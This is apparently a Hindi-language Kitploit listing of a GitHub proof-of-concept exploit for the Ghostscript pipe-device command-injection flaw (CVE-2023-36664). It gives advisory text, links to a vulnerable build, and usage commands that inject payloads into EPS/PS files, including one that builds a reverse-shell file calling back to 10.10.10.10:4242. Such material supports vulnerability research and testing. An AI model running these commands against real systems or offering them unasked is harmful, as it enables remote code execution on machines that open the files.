Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36664-Ghostscript-command-injection — Ghostscript कमांड इंजेक्शन (CVE-2023-36664) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें पेलोड जनरेशन और कोड निष्पादन हेतु EPS/PS फ़ाइलों में इंजेक्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/churamanib/cve-2023-36664-ghostscript-command-injection
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubchuramanib/cve-2023-36664-ghostscript-command-injection

CVE-2023-36664-Ghostscript-command-injection

Ghostscript कमांड इंजेक्शन (CVE-2023-36664) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें पेलोड जनरेशन और कोड निष्पादन हेतु EPS/PS फ़ाइलों में इंजेक्शन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

Ghostscript कमांड इंजेक्शन भेद्यता PoC (CVE-2023-36664)

Ghostscript के संस्करण 10.01.2 से पहले की भेद्यता कोड निष्पादन की ओर ले जाती है (CVSS स्कोर 9.8)।

आधिकारिक भेद्यता विवरण:

Artifex Ghostscript 10.01.2 तक पाइप उपकरणों (%pipe% उपसर्ग या | पाइप कैरेक्टर उपसर्ग के साथ) के लिए अनुमति सत्यापन को गलत तरीके से संभालता है।

डेबियन ने एक सुरक्षा सलाह जारी की जिसमें मनमाने आदेशों के संभावित निष्पादन का उल्लेख किया गया:

"यह पाया गया कि Ghostscript, GPL PostScript/PDF दुभाषिया, पाइप उपकरणों के लिए अनुमति सत्यापन को ठीक से नहीं संभालता है, जिसके परिणामस्वरूप यदि दूषित दस्तावेज़ फ़ाइलों को संसाधित किया जाता है तो मनमाने आदेशों का निष्पादन हो सकता है।"

यह रिपॉजिटरी vsociety ब्लॉग पर उपलब्ध CVE विश्लेषण ब्लॉग पोस्ट के लिए बनाई गई है।

शोषण

यहाँ से Ghostscript 10.01.1 डाउनलोड करें: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 विंडोज x64 निष्पादन योग्य का सीधा लिंक: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

शोषण PS या EPS फ़ाइल खोलने पर हो सकता है और Ghostscript द्वारा पाइप उपकरणों के लिए अनुमति सत्यापन को गलत तरीके से संभालने के कारण कोड निष्पादन की अनुमति दे सकता है।

उपयोग: python3 CVE_2023_36664_exploit.py <input_file> <command>

उदाहरण:

root@kitploit:~
python3 CVE_2023_36664_exploit.py file.eps "calc"

यह file_injected.eps नामक एक नई फ़ाइल उत्पन्न करता है।

इसे कैलकुलेटर को ट्रिगर करने के लिए Ghostscript के साथ खोलें (संस्करण 9.50 के बाद से आपको -dNOSAFER विकल्प का भी उपयोग करना होगा):

root@kitploit:~
gs10011w64.exe -dNOSAFER .\file_injected.eps
प्रमाण

अन्य उदाहरण: run_calculator.eps नामक एक नई EPS फ़ाइल पेलोड "calc" के साथ उत्पन्न करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

rev_shell.eps नामक एक नई EPS फ़ाइल कस्टम IP के साथ उत्पन्न करें (Unix पर ट्रिगर होने पर रिवर्स शेल शुरू करें)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

malicius.ps नामक एक नई PS फ़ाइल पेलोड "calc" के साथ उत्पन्न करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)

root@kitploit:~
python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

file.eps नामक मौजूदा फ़ाइल में दुर्भावनापूर्ण कस्टम पेलोड ("calc") इंजेक्ट करें (विंडोज पर एक नया कैलकुलेटर पॉप अप होता है)

root@kitploit:~
python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

अस्वीकरण

यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें